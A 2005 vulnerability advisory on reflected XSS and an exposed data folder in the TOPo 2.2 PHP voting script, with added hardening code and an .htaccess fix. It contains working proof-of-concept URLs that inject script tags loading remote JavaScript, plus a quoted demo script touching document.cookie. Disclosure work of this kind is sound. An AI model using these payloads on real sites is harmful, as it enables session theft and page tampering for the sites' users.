#######################################################
TOPo 2.2 multiple variable & fields XSS and information disclosure
vendor url:http://ej3soft.ej3.net/index.php?m=info&s=topo&t=info
advisore: http://lostmon.blogspot.com/2005/05/topo-22-multiple-variable-fields-xss.html
vendor notified: yes exploit available: yes.
#######################################################
TOPo is a free TOP (ranking/voting) system written in PHP that works
without a MySQL database. TOPo is specially designed for
web sites hosted on web servers that do not offer
quality MySQL support.
TOPo contains a flaw that allows remote cross-site
scripting attacks. The flaw exists because the application
does not validate the 'm', 's', 'ID' and 't' parameters (and possibly others)
before echoing them back from the 'index.php' script. This could allow an attacker
to create a specially crafted URL that would execute arbitrary
script in a user's browser within the trust relationship between
the browser and the server, leading to a loss of integrity.
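The PoC URLs below all break out of a double-quoted attribute (m=top"> ...), so the reflection point is almost certainly a raw $_GET value interpolated into a link or form action. The following is an added example, not TOPo's own code: it reproduces that pattern in a minimal handler and places the hardened version beside it. The whitelist values, the ID format check and the function names are assumptions taken only from the parameter values that appear in this advisory.

```php
<?php
// Added example, not TOPo source. Assumes index.php interpolates the 'm', 's',
// 't' and 'ID' query parameters into a double-quoted href, as the PoC URLs
// (m=top">...) suggest. Run with: php this_file.php

// --- Vulnerable pattern: raw $_GET values dropped straight into markup ---
function vulnerable_link(array $get): string {
    $m  = $get['m']  ?? 'top';
    $s  = $get['s']  ?? 'info';
    $t  = $get['t']  ?? '';
    $id = $get['ID'] ?? '';
    // m=top"><script>...</script> closes the href attribute and injects a tag.
    return "<a href=\"index.php?m=$m&s=$s&t=$t&ID=$id\">vote</a>";
}

// --- Hardened pattern ---
// 1. Module/section/action names come from a fixed whitelist (values assumed
//    from the URLs in this advisory); anything else falls back to a default
//    instead of being echoed.
// 2. The free-form ID is checked against the shape seen in the PoC URLs
//    (ten digits, a dot, more digits; an assumption) and is still escaped.
// 3. Everything placed in markup goes through htmlspecialchars with ENT_QUOTES
//    so neither " nor ' can break out of an attribute.
const ALLOWED_M = ['top', 'members', 'info'];
const ALLOWED_S = ['info', 'html'];
const ALLOWED_T = ['', 'info', 'puntuar', 'comments', 'edit'];

function pick(array $get, string $key, array $allowed, string $default): string {
    $v = $get[$key] ?? $default;
    return in_array($v, $allowed, true) ? $v : $default;
}

function h(string $v): string {
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function hardened_link(array $get): string {
    $m  = pick($get, 'm', ALLOWED_M, 'top');
    $s  = pick($get, 's', ALLOWED_S, 'info');
    $t  = pick($get, 't', ALLOWED_T, '');
    $id = $get['ID'] ?? '';
    if (!preg_match('/^\d{10}\.\d+$/', $id)) {
        $id = '';
    }
    // http_build_query percent-encodes the values; h() then escapes the
    // remaining & and quote characters for the attribute context.
    $qs = http_build_query(['m' => $m, 's' => $s, 't' => $t, 'ID' => $id]);
    return '<a href="index.php?' . h($qs) . '">vote</a>';
}

// Constructed request mirroring the first PoC URL in this advisory.
$payload = ['m' => 'top"><script>alert(1)</script>', 's' => 'info', 'ID' => '1114815037.2498'];
echo vulnerable_link($payload), "\n"; // the <script> tag lands inside the page
echo hardened_link($payload), "\n";   // 'm' falls back to 'top'; the ID is kept and escaped
```

Whitelisting the navigation parameters is the real fix here: these values select code paths, so there is no reason to ever echo a client-supplied string for them. Escaping alone would also stop the PoCs, but only for the attribute context; a value that is later echoed inside a <script> block or an unquoted attribute would need a different encoder.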
TOPo also contains a flaw that allows remote users to obtain sensitive information.
All data is stored in the '/data/' folder, and the *.dat files there hold all votes,
comments and other information about the sites in the top. Any user can download
these files and obtain the IP addresses of all clients who voted
or added a comment.
################
software used:
###############
Microsoft Windows 2000 [Version 5.00.2195] all fixes.
Internet explorer 6.0 sp1 all fixes.
Netcraft toolbar 1.5.6 (detects all the XSS attacks in this case :D)
Google toolbar 2.0.114.9-big/es
###########
versions:
###########
TOPo v2.2.178 vulnerable.
##############
solution
##############
no solution was available at this time.
############
time line
############
discovered: 13 may 2005
vendor notified: 19 may 2005
vendor response:
vendor fix:
disclosure: 20 may 2005
######################
Proofs of concept, XSS
######################
http://[victim]/topo/index.php?m=top"><SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js></script>&s=info&ID=1114815037.2498
http://[victim]/topo/index.php?m=top&s=info&ID=1115946293.3552"><SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js></SCRIPT>&t=puntuar
http://[victim]/topo/index.php?m=top&s=info"><script>alert()</script>&ID=1115946293.3552&t=puntuar
http://[victim]/topo/index.php?m=top"><script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar
http://[victim]/topo/index.php?m=top&s=info&t=comments&ID=1114815037.2498"><SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js></script>
http://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1&ID=1111068112.7598"><SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js></script>
http://[victim]/topo/index.php?m=members&s=html&t=edit"><SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js></script>
#########################
When adding a new comment, some form fields are also vulnerable to XSS-style attacks:
http://[victim]/top/index.php?m=top&s=info&t=comments&paso=1&ID=1115946293.3552
The 'name' field, the 'your web' field and the 'your email' field
are vulnerable.
##################
example of js.js
##################
Thanks to http://www.drorshalev.com for this script and for hosting it
for this demonstration.
#################
js.js
#################
function showIt(){
    // Prepend a banner that links to alert(document.cookie) and loads two
    // remote images, so the effect of the injected script is visible on the page.
    document.body.innerHTML =
        "<a href='javascript:alert(document.cookie)'><center><b>Your PC Can be hacked Via " +
        document.domain + " XSS ,Html Injection to a Web Site " + document.domain +
        " By DrorShalev.com<br></b><br><img border=0 src='http://sec.drorshalev.com/dev/injection/lig.gif' width=60 HEIGHT=60>" +
        "<img src='http://www.drorshalev.com/dev/injection/gif.jpg.asp' border=1><br></center></a>" +
        document.body.innerHTML;
    // Mirror the message in the browser status bar.
    window.status = "Your PC Can be hacked Via " + document.domain +
        " XSS ,Html Injection to a Web Site " + document.domain + " By DrorShalev.com";
    // Six seconds later, open the explanation text in a view-source window.
    setTimeout("window.open('view-source:http://sec.drorshalev.com/dev/injection/xss.txt')", 6000);
}
// Fire two seconds after the script has loaded.
setTimeout("showIt()", 2000);
################
data disclosure
################
http://[victim]/data/
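The *.dat files only need to be readable by the PHP process, not by the web server's clients. As an added example that is not part of TOPo or the advisory, the following .htaccess, dropped into the data/ directory, removes the directory index and refuses direct requests for the data files while leaving PHP's own fopen() reads untouched. It assumes Apache 2.2 syntax and that AllowOverride permits Options and Limit directives in .htaccess; on Apache 2.4 the two lines inside FilesMatch become "Require all denied". Moving data/ outside the document root and updating the path in TOPo's configuration is the more robust alternative.

```apache
# Added example, not TOPo's own file. Assumed location: topo/data/.htaccess
# Stop the directory listing that exposes the file names.
Options -Indexes

# Deny direct HTTP access to the vote/comment stores (Apache 2.2 syntax;
# use "Require all denied" on Apache 2.4).
<FilesMatch "\.dat$">
    Order allow,deny
    Deny from all
</FilesMatch>
```

After deploying it, a request such as curl -I http://[victim]/topo/data/ and one for any known .dat file should both return 403 instead of a listing or the file contents.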
################ EnD #####################
Thanks to Estrella for being my light.
Thanks to all the http://www.osvdb.org team.
Thanks to http://www.drorshalev.com and Dror for his script and for
hosting it!!!!
Thanks to all who support me day after day!!!
--
Sincerely:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what moves the mind....